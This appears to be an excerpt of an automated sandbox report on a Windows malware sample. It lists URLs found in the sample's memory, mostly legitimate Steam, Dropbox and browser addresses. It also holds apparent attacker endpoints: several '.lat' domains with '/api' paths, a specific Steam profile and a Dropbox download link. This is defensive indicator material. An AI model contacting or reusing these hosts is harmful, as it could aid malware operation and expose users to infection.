Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=BFN_
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=iUcMsAN_acD6&l=e
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dropbox.com/m
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://finickypwk.lat/apiK
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://forums.dropbox.com
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kickykiduz.lat/api#
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://miniatureyu.lat/api
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://status.dropbox.com
Source: k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2039858894.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.c
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/S
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2039858894.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/li
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: k7h8uufe6Y.exe, 00000000.00000003.1999141261.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: k7h8uufe6Y.exe, 00000000.00000003.1999308370.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010857762.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1999141261.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: k7h8uufe6Y.exe, 00000000.00000003.1999308370.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: k7h8uufe6Y.exe, 00000000.00000003.1999308370.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010857762.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1999141261.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: k7h8uufe6Y.exe, 00000000.00000003.1999308370.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42Hw
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com:443/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: k7h8uufe6Y.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: k7h8uufe6Y.exe, 00000000.00000002.2119374553.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://www.dropbox.com/help
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	String found in binary or memory: https://www.dropbox.com/home
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/page_success/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119428983.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfj
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/x
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
